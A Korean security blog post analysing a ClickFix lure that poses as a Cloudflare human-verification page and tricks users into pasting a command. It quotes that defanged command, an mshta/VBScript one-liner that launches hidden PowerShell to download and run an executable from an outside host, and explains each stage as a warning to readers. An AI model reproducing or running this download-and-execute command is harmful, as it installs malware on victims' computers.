ClickFix(클릭픽스)는 최근 사이버 공격자들이 사용하는 새로운 사회공학적 기법으로 사용자를 속여 악성 코드를 실행하도록 유도하는 수법입니다. 지난번에 소개해 드린 루마스틸러 하고 거의 똑같으며 그리고 최근 북한에서도 해당 방법을 악용해서 해외에서 공격을 하고 있습니다. 오늘은 가짜 클라우드파이어(Cloudflare)를 사칭을 하는 녀석을 알아보겠습니다.
해당 악성코드 사이트
hxxps://kvndbb3(.)com일단 해당 사이트에 접속을 해보면 다음과 같은 내용을 확인을 할수가 있습니다.
Verify you are human by completing the action below.
kvndbb3(.)com needs to review the security of your connection before proceeding.
(아래 작업을 완료하여 인간임을 확인하세요.
kvndbb3(.)com은 진행하기 전에 연결의 보안을 검토해야 합니다.)
즉 네가 니겐인지 확인을 하는 것처럼 돼 있지만 실제로는 악성코드를 실행하기 위한 수작에 불과합니다. MS Office, Google Meet, Apple 등의 사이트 또는 토렌트 사이트 그리고 클라우드파이어(Cloudflare)와 같은 방법을 사용하고 있습니다.
뭐~내용을 보면 다음과 같습니다.
해당 지시 사항으로 하면 다음과 같은 Pwershell 명령어가 있는것을 확인을 할 수가 있습니다.
msh?a vbscript:xecute("Cre(a)?O?ject(""WSc?ipt(.)Shell"").Run(""pow(e)rshell
-c iwr 'hxxps://ifra-nt(.)com/o(.)e?e' -o $H?ME\Downloads\v(.)exe; Start-Pr(o)cess
$HOME\Downloads\v(.)exe"",0)(win?ows(.)close)
' I am not (a) robot - Cl??udflare Verification ID: ")
입니다.
분석
1.MSHTA를 이용한 VBScript 실행
mshta vbscript:Execute(...)
MSHTA 는 원래 HTML 애플리케이션(HTA)을 실행하는 도구 VBScript나 JavaScript 코드도 실행할 수 있게 돼 있음 이것을 악용하는 것 알 수 있음
Execute(...) 를 사용하면 VBScript 코드가 즉시 실행
2 VBScript에서 PowerShell 실행
CreateObject(WSc?ipt.Shell)을 사용해 WScript(.)Shell 객체를 생성
Run 메서드를 사용하여 명령어를 실행을 진행하고 0 옵션을 사용해서 백그라운드(숨김) 실행하게 구성이 돼 있음
3 PowerShell을 이용한 원격 파일 다운로드 및 실행
iwr(Invoke-WebRequest)을 사용하여 원격 서버(ifra-nt(.)com)에서 o(.)exe 파일을 다운로드 하고
다운로드된 파일은 $HOME\Downloads\v.exe에 저장
다운로드된 실행 파일(v.exe)을 실행을 합니다. 이게 아마도 악성코드 가능성 100%
4 Cloudflare Verification 메시지
I am not a robot - Cloudflare Verification ID: NiD9pxz
단순한 문자열 주석이며 간단하게 이게 인간 인지 로봇인지 확인을 하는 용도가 아니고 여기서는 그냥 보여주기식
즉 이렇게 사용자 컴퓨터에 악성코드를 설치 및 실행을 하게 구성이 돼 있습니다.
[소프트웨어 팁/보안 및 분석] - 가짜 CAPTCHA(캡차)을 이용한 Lumma Stealer를 통해 유포 되는 악성코드(2025.1.4)
가짜 CAPTCHA(캡차)을 이용한 Lumma Stealer를 통해 유포 되는 악성코드(2025.1.4)
오늘은 가짜 CAPTCHA(캡차)을 이용한 Lumma Stealer를 통해 유포되는 악성코드에 대해 글을 적어보겠습니다. 해당 Lumma Stealer는 2022년 8월부터 러시아 어 포럼의 MaaS(Malware-as-a-Service) 모
wezard4u.tistory.com
개인적으로 만약 제가 북한 해킹 단체라고 하면 이렇게 국내 서비스로 위장할 것이면 네이버하고 비슷한 사이트에서 이렇게 공격을 할 것 같습니다. 물론 눈치가 좋으면 쉽게 이런 ClickFix(클릭픽스) 인 것을 확인할 수가 있겠지만, 일반인 분들은 많이 당할 것 같으며 기본적으로 신뢰 있는 안티바이러스 프로그램과 이렇게 복사 붙여 넣기로 CMD 를 유도한다고 하면 100% 악성코드 설치를 하기 위한 목적일 가능성이 매우 큽니다.
아무튼, 국내 한국에서는 이러한 수법을 사용하는 것은 거의 없겠지만, 해외 사이트 돌아다니다 보면 이런 것 많이 마주치므로 조심하는 것이 좋습니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 윈도우 10,윈도우 11 KB5051974,KB5051987,KB5051989 보안 업데이트 (0) | 2025.02.13 |
|---|---|
| 네이버 전자 문서 사칭 피싱 메일-새로 도착한 세무안내서를 확인하세요.(2025.1.27) (0) | 2025.02.12 |
| 김수키(Kimsuky) 에서 만든 종신안내장 으로 위장한 악성코드-종신안내장v02_곽X환d.zip(2025.2.5) (0) | 2025.02.11 |
| 김수키(Kimsuky) 에서 만든 거래명세서로 위장한 악성코드-거래명세서(2024,10,02) (0) | 2025.02.07 |
| Firefox 135 새로운 번역 언어 및 보안 업데이트 (0) | 2025.02.06 |
| 노드 VPN 스마트폰 IP 우회 변경 사용법(3개월 무료,신년 노드 VPN 70% 할인) (2) | 2025.02.05 |
| 김수키(Kimsuky)에서 만든 보험 사칭 악성코드-241002-2024년 GA영업본부 담당지점 배분(10월)(2025.1.31) (0) | 2025.02.04 |
| 간편 로그인(소셜 로그인)은 문제점 (0) | 2025.02.03 |
